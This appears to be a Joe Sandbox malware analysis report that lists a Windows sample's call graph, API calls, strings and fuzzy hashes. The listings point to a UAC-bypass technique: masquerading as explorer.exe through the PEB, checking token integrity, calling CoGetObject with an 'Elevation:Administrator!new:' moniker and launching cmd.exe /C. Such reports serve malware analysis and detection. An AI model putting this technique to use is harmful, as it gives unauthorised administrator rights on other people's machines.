4047e0 4645->4646 4647 401352 4648 40136b 4647->4648 4649 401384 VirtualProtect 4648->4649 4703 408193 4704 4081a0 4703->4704 4706 4081f5 4703->4706 4705 408203 SetFilePointer 4707 4040d7 ReadFile 4705->4707 4708 4040fa 4705->4708 4706->4705 4707->4708 4650 40a554 4651 40a536 LoadLibraryA 4650->4651 4652 40a530 4650->4652 4651->4652 4652->4651 4653 402b51 4652->4653 4709 40c595 4711 404bcc 4709->4711 4710 404e2b 4711->4710 4712 404ba6 4 API calls 4711->4712 4712->4711 4713 408795 4714 40336b 4713->4714 4716 406ef1 4713->4716 4715 404b6e 4 API calls 4715->4716 4716->4714 4716->4715 4664 402f17 wvsprintfW 4654 408958 CreateFileA DeviceIoControl 4655 4047e0 4654->4655 4439 402b19 4441 402b21 4439->4441 4440 40323a 4441->4440 4443 409727 4441->4443 4444 40211b 4443->4444 4445 402106 4443->4445 4444->4441 4445->4444 4446 40d1eb CoGetObject 4445->4446 4446->4441 4555 408619 4556 40867a 4555->4556 4557 40861d wvsprintfA 4555->4557 4693 4021da 4694 4021dc 4693->4694 4694->4693 4695 404416 GetModuleHandleA 4694->4695 4696 40443f 4695->4696 4511 40665c 4512 40666b 4511->4512 4514 40ed17 4512->4514 4515 40afd6 4512->4515 4516 40b349 4515->4516 4517 4078cc 4516->4517 4520 401f06 4516->4520 4517->4512 4519 40b358 4519->4512 4523 409dfb 4520->4523 4522 401f1f GetTickCount 4522->4519 4523->4522 4565 402adc 4566 402b01 4565->4566 4568 402b11 4566->4568 4572 40299a 4566->4572 4569 40299a 8 API calls 4570 4030fc 4569->4570 4570->4568 4570->4569 4578 40e9a4 4570->4578 4573 4029dc 4572->4573 4574 40b83f 8 API calls 4573->4574 4575 4011c6 4574->4575 4577 4011de 4575->4577 4583 40b83f 4575->4583 4577->4570 4579 404753 4 API calls 4578->4579 4582 409b06 4579->4582 4580 40e9cc 4581 407ea6 4 API calls 4581->4582 4582->4578 4582->4580 4582->4581 4584 40b85d 4583->4584 4585 404753 4 API calls 4584->4585 4586 407dc3 4585->4586 4587 407ea6 4 API calls 4586->4587 4588 406b98 4586->4588 4587->4588 4588->4577 4717 404d9e 4718 404da9 4717->4718 4719 40dfb7 DeviceIoControl 4718->4719 4720 404dba 4719->4720 4350 40dde0 4351 40ddf9 4350->4351 4354 40b2e4 4351->4354 4361 401b95 4354->4361 4356 40b2fe 4365 4069bb 4356->4365 4358 40b313 4369 403375 4358->4369 4362 401baa 4361->4362 4363 40cdfb 4362->4363 4364 40135e VirtualProtect 4362->4364 4363->4356 4364->4362 4366 4069ce 4365->4366 4367 402b51 4366->4367 4368 40a536 LoadLibraryA 4366->4368 4367->4358 4368->4366 4372 40693d 4369->4372 4371 40337d 4373 4046b0 4372->4373 4374 40a2f3 4373->4374 4377 40aea4 GetPEB 4373->4377 4374->4371 4395 40d1f6 GetModuleHandleA 4377->4395 4379 40aeb6 4380 401bd2 4379->4380 4401 404369 GetModuleFileNameW CoInitialize 4379->4401 4382 4044bc 4380->4382 4383 401bdf 4380->4383 4412 403aee CreateMutexW GetLastError 4382->4412 4383->4371 4396 40d219 4395->4396 4397 40d329 LoadLibraryA 4396->4397 4398 40d351 4397->4398 4399 40d39b LoadLibraryA 4398->4399 4400 40d3c4 4399->4400 4400->4379 4414 409543 4401->4414 4406 4043a3 4406->4380 4407 405c4c 8 API calls 4408 4063d7 4407->4408 4411 4025ff 4408->4411 4432 405312 4408->4432 4410 40a943 ExitProcess 4410->4406 4411->4410 4413 403b17 4412->4413 4415 409551 4414->4415 4416 409565 GetWindowsDirectoryW 4415->4416 4417 404393 4416->4417 4418 409587 4416->4418 4422 405c4c 4417->4422 4418->4417 4419 4095b9 NtAllocateVirtualMemory 4418->4419 4419->4417 4420 4095f4 4419->4420 4421 409606 EnterCriticalSection RtlInitUnicodeString RtlInitUnicodeString LeaveCriticalSection LdrEnumerateLoadedModules 4420->4421 4421->4417 4423 409c8c OpenProcessToken 4422->4423 4424 407a51 GetTokenInformation 4423->4424 4425 401071 4423->4425 4426 407a69 LocalAlloc GetTokenInformation 4424->4426 4428 401240 FindCloseChangeNotification 4425->4428 4429 403bc5 4425->4429 4426->4425 4427 40103c GetSidSubAuthorityCount GetSidSubAuthority 4426->4427 4427->4423 4427->4425 4428->4429 4430 40294f 4429->4430 4431 403bcf LocalFree 4429->4431 4430->4406 4430->4407 4431->4430 4433 405325 4432->4433 4436 408392 4432->4436 4434 408337 RtlInitUnicodeString RtlExpandEnvironmentStrings_U 4433->4434 4435 408385 4434->4435 4434->4436 4435->4436 4437 4037e4 RtlNtStatusToDosError RtlRestoreLastWin32Error 4435->4437 4438 403c36 4437->4438 4438->4411 4615 4050a2 4616 4050be RtlInitUnicodeString RtlInitUnicodeString 4615->4616 4617 4043bc 4615->4617 4616->4617 4665 402322 4667 40232c 4665->4667 4666 402339 4667->4666 4668 40b59b DeviceIoControl 4667->4668 4589 402ee4 4592 404ba6 4589->4592 4591 402f02 4593 40aed0 4592->4593 4594 404bc0 4592->4594 4595 404753 4 API calls 4594->4595 4596 407e63 4595->4596 4596->4591 4721 401fa5 4722 408de0 4721->4722 4723 40b59b DeviceIoControl 4722->4723 4558 408627 wvsprintfA 4669 40932a 4670 4046b0 4669->4670 4671 40a2f3 4670->4671 4672 40aea4 36 API calls 4670->4672 4673 4046b5 4672->4673 4597 40e4f0 4599 408e10 4597->4599 4598 404b6e 4 API calls 4598->4599 4599->4597 4599->4598 4600 406ef1 4603 4087a6 4600->4603 4601 40336b 4602 404b6e 4 API calls 4602->4603 4603->4600 4603->4601 4603->4602 4524 403072 4533 40895b CreateFileA DeviceIoControl 4524->4533 4527 40880d DeviceIoControl 4528 409e38 4527->4528 4532 4030b2 4527->4532 4542 40bdea 4528->4542 4530 403d94 4530->4532 4535 40acfc 4530->4535 4534 40307e CreateFileA 4533->4534 4534->4527 4534->4532 4536 402d2d 4 API calls 4535->4536 4537 40ad23 4536->4537 4538 404b6e 4 API calls 4537->4538 4539 407e9a 4538->4539 4540 404b6e 4 API calls 4539->4540 4541 4080f4 4540->4541 4541->4532 4545 406bae 4542->4545 4546 406bd2 4545->4546 4547 40b485 DeviceIoControl 4546->4547 4548 402d86 4547->4548 4548->4530 4618 4082b6 AllocateAndInitializeSid 4619 404853 4618->4619 4620 40483b CheckTokenMembership 4618->4620 4621 40aa98 FreeSid 4619->4621 4620->4619 4620->4621 4674 406137 4675 40cda2 LoadLibraryA 4674->4675 4676 406146 4674->4676 4677 40cdca 4675->4677 4676->4674 4697 4059f8 4698 405a03 4697->4698 4701 40158c DeviceIoControl 4698->4701 4700 405a0b 4702 401253 4701->4702 4702->4700 4622 407ab9 4623 407a69 LocalAlloc GetTokenInformation 4622->4623 4627 401ea5 4622->4627 4624 401071 4623->4624 4625 40103c GetSidSubAuthorityCount GetSidSubAuthority 4623->4625 4629 401240 FindCloseChangeNotification 4624->4629 4630 403bc5 4624->4630 4625->4624 4626 409c8c OpenProcessToken 4625->4626 4626->4624 4628 407a51 GetTokenInformation 4626->4628 4628->4623 4629->4630 4631 40294f 4630->4631 4632 403bcf LocalFree 4630->4632 4632->4631 4678 407539 GetModuleHandleW GetProcessHeap HeapAlloc 4679 403c07 4678->4679 4656 40197b 4657 404ba6 4 API calls 4656->4657 4659 40198e 4657->4659 4658 404ba6 4 API calls 4658->4659 4659->4658 4660 401999 4659->4660 4633 40bcbd GetProcessHeap HeapFree 4559 40803e GetProcessHeap HeapAlloc 4549 40aa7f 4550 40c2f6 LocalAlloc 4549->4550 4551 40aa8e 4549->4551 4550->4551 4604 406eff 4605 40b146 LocalFree 4604->4605 4606 406f0e 4604->4606 4605->4606 4661 40d17f 4662 40d1eb CoGetObject 4661->4662 4663 40d183 4661->4663 4663->4662

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00409543 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 78memorylibrarynativeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409574
                                                                                                                                                                      • NtAllocateVirtualMemory.NTDLL(000000FF,0046C2D0,00000000,00001000,00003000,00000004), ref: 004095E1
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(DB51E8EC), ref: 00409610
                                                                                                                                                                      • RtlInitUnicodeString.NTDLL(00000180,00550000), ref: 00409626
                                                                                                                                                                      • RtlInitUnicodeString.NTDLL(00000178,00550000), ref: 0040963C
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(DB51E8EC), ref: 00409649
                                                                                                                                                                      • LdrEnumerateLoadedModules.NTDLL(00000000,004050A2,00404393), ref: 0040965A
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalInitSectionStringUnicode$AllocateDirectoryEnterEnumerateLeaveLoadedMemoryModulesVirtualWindows
                                                                                                                                                                      • String ID: explorer.exe
                                                                                                                                                                      • API String ID: 3728205514-3187896405
                                                                                                                                                                      • Opcode ID: 971d90eb416ca67aafcaf3557b906dfb5bbb6d99924e81ee9f7e95ee9359d988
                                                                                                                                                                      • Instruction ID: d3c5517ac64ebe0f4a93bb8fcf9093c65cacff95b6910bca11f849b0b04bbd4d
                                                                                                                                                                      • Opcode Fuzzy Hash: 971d90eb416ca67aafcaf3557b906dfb5bbb6d99924e81ee9f7e95ee9359d988
                                                                                                                                                                      • Instruction Fuzzy Hash: 4F3195B5940208EBC704DF90DCC5FA97775AB48305F1081BAFA05672D1E7B8AE85CB5D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040AEA4 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 189 40aea4-40aec0 GetPEB call 40d1f6 192 401bd2-401bd9 call 40c13c 189->192 193 40aec6 call 404369 189->193 198 4044bc-4044c3 call 403aee 192->198 199 401bdf 192->199 197 40aecb 193->197 197->192 203 4044c9 198->203 204 40a95e-40a96a call 4043ad call 407d21 198->204 200 40bfa2-40bfa5 199->200 203->200 209 40a970-40a980 Sleep call 4023f2 204->209 210 402b44-402b46 ExitProcess 204->210 209->210
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Module$FileHandleInitializeLibraryLoadName
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1691763914-0
                                                                                                                                                                      • Opcode ID: 1d1e830cd534af54437783b51cc9c08bc841a27dcc6edcfaa80d65915427b13e
                                                                                                                                                                      • Instruction ID: b20ac1345fbffd2ee6b09d0fcfa97f88ae309217d757d61775f2d603f36cc11d
                                                                                                                                                                      • Opcode Fuzzy Hash: 1d1e830cd534af54437783b51cc9c08bc841a27dcc6edcfaa80d65915427b13e
                                                                                                                                                                      • Instruction Fuzzy Hash: 0BF0BE70608345D6C6047FB38E4672A76B8AF0030DF10407FFD02B62D2EA7E9A11559F
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00405C4C Relevance: 12.1, APIs: 8, Instructions: 78memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A5F
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000000), ref: 00407A6B
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A86
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Token$InformationLocal$AllocChangeCloseFindFreeNotificationOpenProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2854556994-0
                                                                                                                                                                      • Opcode ID: 2fabac034638274b2c3e67be2bc06953f5cdff95292f6c9f39c7e9c359d166b0
                                                                                                                                                                      • Instruction ID: 2e4b4cc31351ce880421fb230fd6ac05725b6f10eb8191371f756e524e2f733f
                                                                                                                                                                      • Opcode Fuzzy Hash: 2fabac034638274b2c3e67be2bc06953f5cdff95292f6c9f39c7e9c359d166b0
                                                                                                                                                                      • Instruction Fuzzy Hash: ED313CB4A04208FFDB14CFD4C948BAEBBF8AB48301F1081AAE511B72D4D774AB04DB65
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00404369 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000105), ref: 00404380
                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00404388
                                                                                                                                                                        • Part of subcall function 00409543: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409574
                                                                                                                                                                        • Part of subcall function 00409543: NtAllocateVirtualMemory.NTDLL(000000FF,0046C2D0,00000000,00001000,00003000,00000004), ref: 004095E1
                                                                                                                                                                        • Part of subcall function 00409543: EnterCriticalSection.KERNEL32(DB51E8EC), ref: 00409610
                                                                                                                                                                        • Part of subcall function 00409543: RtlInitUnicodeString.NTDLL(00000180,00550000), ref: 00409626
                                                                                                                                                                        • Part of subcall function 00409543: RtlInitUnicodeString.NTDLL(00000178,00550000), ref: 0040963C
                                                                                                                                                                        • Part of subcall function 00409543: LeaveCriticalSection.KERNEL32(DB51E8EC), ref: 00409649
                                                                                                                                                                        • Part of subcall function 00409543: LdrEnumerateLoadedModules.NTDLL(00000000,004050A2,00404393), ref: 0040965A
                                                                                                                                                                        • Part of subcall function 00405C4C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                        • Part of subcall function 00405C4C: LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                        • Part of subcall function 00405C4C: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040A945
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalInitProcessSectionStringUnicode$AllocateChangeCloseDirectoryEnterEnumerateExitFileFindFreeInitializeLeaveLoadedLocalMemoryModuleModulesNameNotificationOpenTokenVirtualWindows
                                                                                                                                                                      • String ID: %systemroot%\system32\cmd.exe$/C
                                                                                                                                                                      • API String ID: 41577365-3057154508
                                                                                                                                                                      • Opcode ID: c5e22f618a67b604fe27e09ba26f5c85a86b36c7864aea17beee92a495aee461
                                                                                                                                                                      • Instruction ID: 7b01f62542bec0b1d87828faea97dd6a3c55c304531570e4c9315d46f9a50642
                                                                                                                                                                      • Opcode Fuzzy Hash: c5e22f618a67b604fe27e09ba26f5c85a86b36c7864aea17beee92a495aee461
                                                                                                                                                                      • Instruction Fuzzy Hash: 9411ABB290430866D710BB60EC47FDE73299B54705F0045BBB709B50C2ED7997D88EAE
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00407AB9 Relevance: 6.1, APIs: 4, Instructions: 59memoryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 53 407ab9-407abc 54 407a69-407a8e LocalAlloc GetTokenInformation 53->54 55 407abe 53->55 56 407a94 54->56 57 40103c-40106b GetSidSubAuthorityCount GetSidSubAuthority 54->57 58 407abf-407ad2 55->58 59 401236-40123a 56->59 60 401071 57->60 61 409c8c-409c9c OpenProcessToken 57->61 62 408020-408024 58->62 63 407ad8-407afe call 4055b9 58->63 69 401240-40124a FindCloseChangeNotification 59->69 70 403bc5-403bc9 59->70 60->59 65 407a51-407a68 GetTokenInformation 61->65 66 409ca2 61->66 67 401ea5-401eb9 62->67 68 40802a-408031 62->68 78 407b04-407b0a 63->78 79 4059ea 63->79 65->54 66->59 74 402035-40203e 67->74 75 401ebf-401ed3 67->75 72 408037-408039 68->72 73 4021ce 68->73 69->70 76 40294f-402955 70->76 77 403bcf-403bd9 LocalFree 70->77 80 403d6f-403d72 72->80 73->80 81 4045e8-4045fb 74->81 75->74 82 401ed9-401ee0 75->82 77->76 78->62 79->58 84 404601-404621 call 4055b9 call 40b8c1 81->84 85 409bce-409beb call 40c187 call 40dcf9 call 40ce09 81->85 82->74 83 401ee6-401ee8 82->83 83->80 94 40b344 84->94 95 404627-40462e 84->95 101 409bf1-409bf3 85->101 102 4024fe-40250e call 40dcf9 85->102 94->81 95->94 97 404634-40463e 95->97 99 404644-40464b 97->99 100 40cc1b-40cc25 97->100 103 404651 99->103 104 409ca7-40a398 99->104 105 40cc2b-40cc32 100->105 106 40997f-409986 100->106 101->80 102->80 103->100 104->94 112 40a39e-40a3b3 104->112 105->104 109 40cc38 105->109 106->94 110 40998c 106->110 109->106 110->104 113 40a3b6 112->113 113->113
                                                                                                                                                                      APIs
                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,00000000), ref: 00407A6B
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00407A86
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Local$AllocChangeCloseFindFreeInformationNotificationToken
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2094194634-0
                                                                                                                                                                      • Opcode ID: dfd389ba0a6e21506ee3ce54b84a7e53c4fc79e48b909ed38b184a154f02c170
                                                                                                                                                                      • Instruction ID: 8c14f008afbfcab52b1f24e0be9b5b67c8a06fc3440972dff98bedf792b56cd5
                                                                                                                                                                      • Opcode Fuzzy Hash: dfd389ba0a6e21506ee3ce54b84a7e53c4fc79e48b909ed38b184a154f02c170
                                                                                                                                                                      • Instruction Fuzzy Hash: 2E215E74D04208EFCB04CFE4C959AEEBBB5AB08305F1480AAE505B7394C7746B40DF29
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00409727 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 114 409727-40973b 115 409741-409744 114->115 116 402106-402115 call 405c31 114->116 118 404b9d-404ba0 115->118 120 40d182-40d18d 116->120 121 40211b-40211e 116->121 122 40d193-40d1f1 call 408bfe call 40b160 call 40335c CoGetObject 120->122 123 40d18e call 40335c 120->123 121->118 123->122
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: $$Elevation:Administrator!new:
                                                                                                                                                                      • API String ID: 0-4251798642
                                                                                                                                                                      • Opcode ID: 62b649c32f93d2337679038de5d7ba034d8f130c97f012f79e63509bd4f77841
                                                                                                                                                                      • Instruction ID: 0ae50f5eb3c30b6def060569edfd5a96dae8f03997bbe75f6d7b2be729599e56
                                                                                                                                                                      • Opcode Fuzzy Hash: 62b649c32f93d2337679038de5d7ba034d8f130c97f012f79e63509bd4f77841
                                                                                                                                                                      • Instruction Fuzzy Hash: B31154B1C1020CABCB10EF94DD85AEE7778AB54305F14456AFA097A181E738EB44CBA5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040D17F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 131 40d17f-40d181 132 40d183-40d1ea call 40335c call 408bfe call 40b160 call 40335c 131->132 133 40d1eb-40d1f1 CoGetObject 131->133 132->133
                                                                                                                                                                      APIs
                                                                                                                                                                      • CoGetObject.OLE32(?,00000024,?,?), ref: 0040D1EB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Object
                                                                                                                                                                      • String ID: $$Elevation:Administrator!new:
                                                                                                                                                                      • API String ID: 2936123098-4251798642
                                                                                                                                                                      • Opcode ID: 69272883a17b5f6f07e2d21893714d2c4baf9a1707031f0601c46702adeeea6a
                                                                                                                                                                      • Instruction ID: b31a3ccbf289bc63fcd2c03f84205c468a6b0dd351633bc6c62a4601e098767b
                                                                                                                                                                      • Opcode Fuzzy Hash: 69272883a17b5f6f07e2d21893714d2c4baf9a1707031f0601c46702adeeea6a
                                                                                                                                                                      • Instruction Fuzzy Hash: 140162B2810208ABCB05EF90DC95DDE7B78AB18305F08455EF9057A181EB39E748CB75
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004063CE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00405C4C: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401244
                                                                                                                                                                        • Part of subcall function 00405C4C: LocalFree.KERNEL32(00000000), ref: 00403BD3
                                                                                                                                                                        • Part of subcall function 00405C4C: OpenProcessToken.ADVAPI32(000000FF,00000008,00000000), ref: 00409C94
                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 0040A945
                                                                                                                                                                        • Part of subcall function 00405312: RtlInitUnicodeString.NTDLL(?,00007FFD), ref: 00408342
                                                                                                                                                                        • Part of subcall function 00405312: RtlExpandEnvironmentStrings_U.NTDLL(00000000,?,?,00000000), ref: 00408372
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000A.00000002.1723331720.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 0000000A.00000002.1723228601.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723388567.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723419830.0000000000413000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      • Associated: 0000000A.00000002.1723937905.000000000046E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_10_2_400000_6374.jbxd
                                                                                                                                                                      Yara matches
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$ChangeCloseEnvironmentExitExpandFindFreeInitLocalNotificationOpenStringStrings_TokenUnicode
                                                                                                                                                                      • String ID: %systemroot%\system32\cmd.exe$/C
                                                                                                                                                                      • API String ID: 1629495445-3057154508
